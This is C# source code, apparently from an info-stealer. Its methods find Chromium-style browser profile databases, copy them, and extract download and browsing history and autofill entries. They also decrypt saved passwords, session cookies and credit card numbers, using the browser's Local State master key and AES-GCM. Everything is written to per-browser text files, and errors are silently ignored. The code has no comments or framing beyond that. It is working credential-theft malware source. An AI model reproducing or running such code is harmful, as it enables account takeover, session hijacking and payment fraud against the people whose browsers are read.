public static void GetDownloads(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
// Console.WriteLine(path);
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "History", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "History", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
string result = "";
try
{
if (File.Exists(file))
{
string str = "Unknown (" + path + ")";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
if (File.Exists(bd))
{
File.Delete(bd);
}
File.Copy(loginData, bd);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("downloads");
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string PATH = sqlHandler.GetValue(rowNum, 3),
URL = sqlHandler.GetValue(rowNum, 15);
result += string.Format("URL: {0}\r\nPath: {1}\r\n----------------------------\r\n", URL, PATH);
Downloads++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.WriteAllText(path2save + "\\" + "Downloads_" + str + ".txt", result);
}
}
catch
{
}
}
}
}
}
catch { }
}
public static void GetAutofills(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
// Console.WriteLine(path);
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
if (File.Exists(bd))
{
File.Delete(bd);
}
File.Copy(loginData, bd);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("autofill");
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string Name = sqlHandler.GetValue(rowNum, 0),
Value = sqlHandler.GetValue(rowNum, 1);
result += string.Format("Name: {0}\r\nValue: {1}\r\n----------------------------\r\n", Name, Value);
Autofills++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Autofills_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Autofills_" + str + ".txt", result);
}
}
}
catch
{
}
}
}
}
}
catch { }
}
public static void GetCards(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
if (File.Exists(bd))
{
File.Delete(bd);
}
File.Copy(loginData, bd);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("credit_cards");
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string Number = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)))),
Name = sqlHandler.GetValue(rowNum, 1),
Exp_m = sqlHandler.GetValue(rowNum, 2),
Exp_y = sqlHandler.GetValue(rowNum, 3),
Billing = sqlHandler.GetValue(rowNum, 9);
result += string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", Name, Exp_m, Exp_y, Number, Billing);
CC++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Cards_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Cards_" + str + ".txt", result);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
public static void GetPasswordsOpera(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string[] files = null;
string result = "";
try
{
Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
string localState = file + "\\..\\Local State";
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.Copy(loginData, bd);
File.Copy(localState, ls);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("logins");
string keyStr = File.ReadAllText(ls);
string[] lines = Regex.Split(keyStr, "\"");
int index = 0;
foreach (string line in lines)
{
if (line == "encrypted_key")
{
keyStr = lines[index + 2];
break;
}
index++;
}
byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string passStr = sqlHandler.GetValue(rowNum, 5);
byte[] pass = Encoding.Default.GetBytes(passStr);
string decrypted = "";
try
{
if (passStr.StartsWith("v10") || passStr.StartsWith("v11"))
{
byte[] iv = pass.Skip(3).Take(12).ToArray(); // From 3 to 15
byte[] payload = pass.Skip(15).ToArray();
decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
}
else
{
decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass));
}
}
catch { }
result += "Url: " + sqlHandler.GetValue(rowNum, 1) + "\r\n";
result += "Login: "******"\r\n";
result += "Passwords: " + decrypted + "\r\n";
result += "Browser: " + str + "\r\n\r\n";
Passwords++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
}
}
}
catch
{
}
}
}
}
}
catch { }
}
public static void GetCookies(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
string localState = file + "\\..\\..\\Local State";
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.Copy(loginData, bd);
File.Copy(localState, ls);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("cookies");
string keyStr = File.ReadAllText(ls);
string[] lines = Regex.Split(keyStr, "\"");
int index = 0;
foreach (string line in lines)
{
if (line == "encrypted_key")
{
keyStr = lines[index + 2];
break;
}
index++;
}
byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string valueStr = sqlHandler.GetValue(rowNum, 12);
byte[] value = Encoding.Default.GetBytes(valueStr);
string decrypted = "";
try
{
if (valueStr.StartsWith("v10"))
{
// Console.WriteLine("!=============== AES 256 GCM COOKIES ============!");
byte[] iv = value.Skip(3).Take(12).ToArray(); // From 3 to 15
byte[] payload = value.Skip(15).ToArray();
decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
}
else
{
decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(value));
}
string host_key = sqlHandler.GetValue(rowNum, 1),
name = sqlHandler.GetValue(rowNum, 2),
PATH = sqlHandler.GetValue(rowNum, 4),
expires_utc = sqlHandler.GetValue(rowNum, 5),
secure = sqlHandler.GetValue(rowNum, 6);
result += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", host_key, PATH, secure.ToUpper(), expires_utc, name, decrypted);
Cookies++;
}
catch { }
}
catch { }
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
}
}
}
catch { }
}
}
}
}
catch { }
}
public static void GetHistory(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "History", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "History", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
if (File.Exists(bd))
{
File.Delete(bd);
}
File.Copy(loginData, bd);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("urls");
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string URL = sqlHandler.GetValue(rowNum, 1),
Title = sqlHandler.GetValue(rowNum, 2);
result += string.Format("\r\nTitle: {0}\r\nUrl: {1}", Title, URL);
History++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "History_" + str + ".txt", result, Encoding.Default);
}
else
{
File.WriteAllText(path2save + "\\" + "History_" + str + ".txt", result, Encoding.Default);
}
}
}
catch
{
}
}
}
}
}
catch { }
}
